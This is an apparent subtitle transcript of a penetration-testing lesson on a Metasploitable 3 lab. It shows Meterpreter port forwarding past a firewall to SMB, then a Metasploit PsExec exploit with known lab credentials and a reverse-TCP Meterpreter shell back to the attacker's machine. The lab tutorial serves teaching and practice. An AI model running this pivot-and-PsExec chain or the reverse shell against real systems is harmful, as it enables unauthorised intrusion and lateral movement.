1 00:00:00,630 --> 00:00:02,650 Now, you may have heard about S
2 00:00:02,670 --> 00:00:08,610 SH port forwarding. If you have, you will be somewhat familiar with this section.
3 00:00:10,330 --> 00:00:17,410 However, the port forwarding technique used in Meterpreter is like SSH port forwarding, so.
4 00:00:18,380 --> 00:00:25,190 This functionality will give you access to the ports on the target that you can't otherwise reach.
5 00:00:26,690 --> 00:00:31,950 So to understand how this works, just indulge me a moment, will you?
6 00:00:32,000 --> 00:00:33,320 I'll tell you a little story.
7 00:00:34,460 --> 00:00:41,000 Think of a penetration test in which you successfully compromise and gain access to a target.
8 00:00:42,390 --> 00:00:50,730 You're with me so far, but you are not allowed to access ports 3389 and 4
9 00:00:50,730 --> 00:00:55,650 45, which can only be locally accessed for security reasons.
10 00:00:57,210 --> 00:01:02,670 So at this point, you need to forward these ports on the target to yourself.
11 00:01:04,050 --> 00:01:11,130 So by using these port forwarding techniques in Meterpreter, you can reach a port on a target that
12 00:01:11,130 --> 00:01:14,070 you can't reach by any other way.
13 00:01:15,000 --> 00:01:21,540 It just so happens the Meterpreter portfwd command does all of this magic for us.
14 00:01:22,720 --> 00:01:27,910 And it's going to relay TCP connections to and from the connected machines.
15 00:01:29,910 --> 00:01:34,110 So I'm going to assume you already have a Meterpreter shell, like I do here.
16 00:01:35,340 --> 00:01:43,890 I also have a SYSTEM-level session on Metasploitable 3 using WinRM as the exploit that you've discovered
17 00:01:43,890 --> 00:01:44,400 before.
18 00:01:45,870 --> 00:01:48,140 So, all right, same page, same page.
19 00:01:49,210 --> 00:01:55,570 So let me first check if I can reach port 445 after enabling Windows Firewall on my Metasploitable
20 00:01:55,570 --> 00:01:55,900 3.
21 00:01:57,040 --> 00:01:58,290 So I'll open up a new tab.
22 00:02:00,220 --> 00:02:07,750 And nmap -p 445 -sS, then the target IP address.
23 00:02:09,440 --> 00:02:10,880 And the port is filtered.
24 00:02:12,230 --> 00:02:17,960 So this will mean that the port is behind the firewall and it won't give us a response.
25 00:02:19,050 --> 00:02:21,330 So we'll go back to the Meterpreter session.
26 00:02:22,650 --> 00:02:26,820 Type in shell as my command to get into the Windows shell.
27 00:02:28,010 --> 00:02:34,030 I want to check if port 445 is really closed or whatever it's doing.
28 00:02:35,240 --> 00:02:44,120 So I'll type netstat -a | findstr 445.
29 00:02:45,860 --> 00:02:52,100 Now, as you see here, port 445 is listening locally.
30 00:02:53,340 --> 00:02:55,230 OK, so exit the shell.
31 00:02:57,520 --> 00:03:04,780 And now you discover that port 445 is open on the target, but you can't access it to
32 00:03:04,780 --> 00:03:08,380 make a PsExec or execute something else on that port.
33 00:03:09,830 --> 00:03:15,260 And that's why, thankfully, the Meterpreter portfwd command will give us a hand.
34 00:03:17,230 --> 00:03:18,220 portfwd
35 00:03:19,410 --> 00:03:20,070 -h.
36 00:03:21,200 --> 00:03:27,920 The help menu is awfully clear, so you can create port forwards and manage them.
37 00:03:29,630 --> 00:03:31,790 And I'm going to list if I have any.
38 00:03:32,810 --> 00:03:34,340 portfwd list.
39 00:03:35,950 --> 00:03:36,760 No, I don't have any.
40 00:03:38,250 --> 00:03:40,870 So it only takes a few seconds to add some.
41 00:03:42,450 --> 00:03:46,230 To add a portfwd rule, type portfwd add.
42 00:03:49,120 --> 00:03:54,010 Then -l for the local port on your system, and then
43 00:03:54,970 --> 00:03:57,880 -p for the port on the target.
44 00:03:58,870 --> 00:04:04,570 And finally, -r to specify the target IP address.
45 00:04:05,970 --> 00:04:07,380 And then you can add a rule.
46 00:04:08,470 --> 00:04:09,820 So now let's list it again.
47 00:04:11,350 --> 00:04:13,930 All righty, then, you have a portfwd rule.
48 00:04:15,930 --> 00:04:20,060 So, you know, this forward rule is even valid outside Metasploit.
49 00:04:21,110 --> 00:04:22,400 So let's go to another tab.
50 00:04:23,660 --> 00:04:26,180 And now I will make an nmap scan.
51 00:04:27,680 --> 00:04:30,560 But this time I'm going to use my localhost IP.
52 00:04:31,470 --> 00:04:37,050 As well as the local port that I bound remote port 445 to, 4445.
53 00:04:38,060 --> 00:04:45,050 So now the query will be nmap -p 4445 -sS
54 00:04:46,460 --> 00:04:49,790 127.0.0.1.
55 00:04:51,990 --> 00:04:57,300 And I can see now that port 4445 is open on my localhost.
56 00:04:58,430 --> 00:05:00,980 Now, it doesn't really make sense, you know.
57 00:05:01,960 --> 00:05:09,130 So add -sV to this query to identify the service information.
58 00:05:10,890 --> 00:05:13,240 And because of the forwarding, it's a little slow.
59 00:05:14,280 --> 00:05:15,690 OK, well, not that much.
60 00:05:17,730 --> 00:05:24,600 So have a look at that: nmap detects that the service on my local port 4445 is a Microsoft service,
61 00:05:24,600 --> 00:05:28,440 which means the SMB service is running on that port.
62 00:05:29,900 --> 00:05:31,490 So I can go back to Metasploit.
63 00:05:33,120 --> 00:05:34,350 Background the session.
64 00:05:35,630 --> 00:05:42,050 Now, the last step is making a PsExec back to the target over the port forward.
65 00:05:42,860 --> 00:05:45,380 So first, let me choose this exec.
66 00:05:46,250 --> 00:05:47,420 use exploit/
67 00:05:48,370 --> 00:05:49,030 windows/
68 00:05:49,950 --> 00:05:52,520 smb/psexec.
69 00:05:54,270 --> 00:05:55,920 Show me the options.
70 00:05:57,850 --> 00:05:58,840 Set RHOST
71 00:05:59,990 --> 00:06:03,410 to 127.0.0.1.
72 00:06:04,400 --> 00:06:07,970 And it's the same logic as what we used for nmap.
73 00:06:09,150 --> 00:06:15,450 So because I need to exploit the service running on port 4445 on my localhost, which forwards
74 00:06:15,450 --> 00:06:20,970 everything to port 445 on my Metasploitable 3, so.
75 00:06:21,980 --> 00:06:25,910 Set RPORT to 4445.
76 00:06:27,080 --> 00:06:30,050 Set SMBUser to vagrant.
77 00:06:31,060 --> 00:06:35,190 And SMBPass to vagrant as well.
78 00:06:36,610 --> 00:06:37,420 Set payload
79 00:06:39,550 --> 00:06:42,340 to windows/meterpreter/
80 00:06:43,900 --> 00:06:45,600 reverse_tcp.
81 00:06:47,040 --> 00:06:50,700 Set LHOST to the IP address of your Kali.
82 00:06:52,260 --> 00:06:57,720 Set LPORT to something that you want; let's choose 555.
83 00:06:59,010 --> 00:07:05,570 And I think I set up everything, but double checking is always better, so show the options again.
84 00:07:08,040 --> 00:07:12,090 And nothing extra to configure, so that I can exploit.
85 00:07:14,390 --> 00:07:16,260 And I think that boy is doing quite well.
86 00:07:17,960 --> 00:07:23,870 So at this point, sometimes sessions don't open or sometimes two sessions open.
87 00:07:24,780 --> 00:07:27,330 So you can try it again, don't worry.
88 00:07:28,560 --> 00:07:31,680 And the session opened, so let's use the gorgeous duo.
89 00:07:32,830 --> 00:07:34,000 getuid.
90 00:07:36,030 --> 00:07:36,480 sysinfo.
91 00:07:38,670 --> 00:07:44,460 And you successfully ran PsExec and have a session on Metasploitable 3.